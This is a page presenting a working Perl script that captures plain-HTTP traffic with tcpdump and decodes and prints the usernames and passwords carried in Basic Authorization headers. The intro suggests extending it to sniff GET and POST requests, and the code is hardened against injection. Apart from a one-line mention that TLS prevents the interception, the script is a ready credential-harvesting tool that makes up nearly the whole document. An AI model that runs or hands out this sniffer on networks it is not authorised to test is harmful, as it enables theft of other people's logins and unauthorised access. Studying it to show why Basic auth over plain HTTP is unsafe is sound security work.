HTTP Header Sniffer

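This Perl script sniffs HTTP Authorization headers, decodes them, and displays them. It can also be used to sniff GET and POST requests with little modification. Basic credentials are only Base64-encoded, not encrypted, so they are readable by anyone on the path of a plain-HTTP (port 80) connection; serving the site over TLS is what prevents this.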

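#!/usr/bin/perl
#
# Reads hex dumps of traffic to TCP port 80 from tcpdump, reassembles the
# printable payload of each packet, and prints the decoded value of every
# "Authorization: Basic ..." header found in it.
#
# Usage: script [LIMIT]
#   LIMIT - number of packet header lines to process before exiting
#           (default 5000).

use strict;
use warnings;
use MIME::Base64 qw(decode_base64);

my $LIMIT = shift || 5000;

$| = 1;    # unbuffered output so results appear as packets arrive

# List-form pipe open: tcpdump is executed directly, without a shell, and a
# failure to start it is reported instead of being silently ignored.
open(my $dump, '-|', '/usr/sbin/tcpdump', '-lnx', '-s', '1024',
    'dst', 'port', '80')
    or die "cannot start tcpdump: $!\n";

# Print the decoded credentials of every Basic Authorization header in the
# given payload text.
#
# The captured value comes straight off the network, so it is never handed
# to a shell (the earlier `echo $hash|openssl ...` form allowed command
# injection by anyone able to send a request past the capture point).  Only
# Base64 alphabet characters are accepted and decoding is done in-process.
sub report_basic_credentials {
    my ($payload) = @_;
    return unless defined $payload && length $payload;

    # Only "Basic" is decoded; other schemes are skipped rather than being
    # decoded from a stale capture group.  The broader
    # (GET|POST|WWW-Authenticate|Authorization) pattern mentioned by the
    # original author is not enabled here.
    while ($payload =~ m{Authorization: Basic ([A-Za-z0-9+/=]+)}g) {
        my $decoded = decode_base64($1);

        # Decoded bytes are attacker-controlled: escape anything that is not
        # printable ASCII so it cannot emit terminal control sequences.
        $decoded =~ s/([^\x20-\x7E])/sprintf('\\x%02x', ord($1))/ge;
        print "$decoded\n";
    }
    return;
}

my ($client, $host);
my $packet = '';

LINE:
while (my $line = <$dump>) {
    if ($line =~ /^\S/) {
        # A line starting in column 0 is a packet header: the payload
        # collected so far is complete, so scan it before starting over.
        report_basic_credentials($packet);
        $packet = '';
        ($client, $host) = (undef, undef);

        last LINE unless $LIMIT--;

        # Track only packets with the PUSH flag and a non-zero length.
        # NOTE(review): this "P seq:seq(len)" form looks like the header
        # layout of older tcpdump releases - confirm against the installed
        # version's output.
        if ($line =~ /P \d+:\d+\((\d+)\)/ && $1 > 0) {
            ($client, $host) =
                $line =~ /(\d+\.\d+\.\d+\.\d+).+ > (\d+\.\d+\.\d+\.\d+)/;
        }

        # The header line itself carries no hex dump, so do not feed it to
        # the decoder below.
        next LINE;
    }

    next LINE unless $client && $host;

    $line =~ s/^\s+\S+\s+//;    # remove initial address indicator
    $line =~ s/\s{2}.*//;       # remove trailing dump
    $line =~ s/\s+//;
    $line =~ s/([0-9a-f]{2})\s?/chr(hex($1))/eg;    # hex pairs -> bytes
    $line =~ tr/\x1F-\x7E\r\n//cd;                  # keep printable bytes only
    $packet .= $line;
}

# Scan whatever was collected for the final packet (empty if the loop ended
# on the limit, since the payload is reset right after it is scanned).
report_basic_credentials($packet);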